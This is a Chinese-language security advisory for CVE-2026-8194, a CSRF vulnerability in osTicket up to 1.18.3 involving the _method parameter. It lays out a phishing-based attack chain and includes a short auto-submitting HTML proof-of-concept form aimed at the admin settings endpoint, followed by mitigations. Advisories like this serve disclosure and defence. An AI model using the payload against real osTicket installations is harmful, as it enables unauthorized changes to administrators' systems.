CVE-2026-8194 osTicket跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-8194

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

osTicket

漏洞概述

osTicket在1.18.3及之前版本中发现安全漏洞。问题出在Dispatcher组件的include/class.dispatcher.php文件中，由于对_method参数处理不当，导致存在CSRF漏洞。攻击者可利用此漏洞诱导用户执行非预期操作，且利用代码已公开，官方尚未修复。

技术细节

该漏洞源于osTicket在处理dispatch逻辑时未对_method参数进行严格的CSRF防护。攻击者可构造恶意HTML页面，诱导已登录管理员访问。当受害者浏览器发送请求时，会自动携带认证Cookie。由于服务器端信任_method参数指定的动作且未验证CSRF Token，攻击者得以在受害者无感知的情况下执行敏感操作（如修改配置），导致系统完整性受损。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统使用的是存在漏洞的osTicket版本（<= 1.18.3）。

STEP 2

2. 构造攻击载荷

攻击者编写包含恶意HTML表单的网页，表单中包含_method参数并指向敏感功能接口。

STEP 3

3. 投递载荷

攻击者通过社会工程学手段（如钓鱼邮件）将恶意链接发送给目标系统的管理员或特权用户。

STEP 4

4. 执行攻击

受害者在已登录状态下点击链接，浏览器自动发送带有身份凭证的请求，服务器执行非预期操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-8194 -->
<html>
  <body>
    <!-- Simulate a request to the vulnerable endpoint -->
    <form action="http://vulnerable-host/scp/settings.php" method="POST">
      <input type="hidden" name="_method" value="PUT" />
      <input type="hidden" name="default_dept_id" value="1" />
      <input type="submit" value="Submit Request" />
    </form>
    <script>
      // Automatically submit the form to trigger the CSRF
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

osTicket <= 1.18.3

防御指南

临时缓解措施

由于官方尚未发布修复补丁，建议暂时限制后台管理访问的来源IP，或部署WAF过滤包含_method参数的请求。管理员应警惕不明来源的链接，并在操作前检查URL。可临时审查PR #6945中的修复代码进行手动修补。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8194
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8194
3 Details https://www.cvedetails.com/cve/CVE-2026-8194/
4 VulDB https://vuldb.com/cve/CVE-2026-8194
5 Link https://github.com/az10b/security-advisories/blob/main/csrf_bypass_osTicket.md
6 Link https://github.com/osTicket/osTicket/
7 Link https://github.com/osTicket/osTicket/pull/6945
8 Link https://vuldb.com/submit/802755
9 Link https://vuldb.com/vuln/362346
10 Link https://vuldb.com/vuln/362346/cti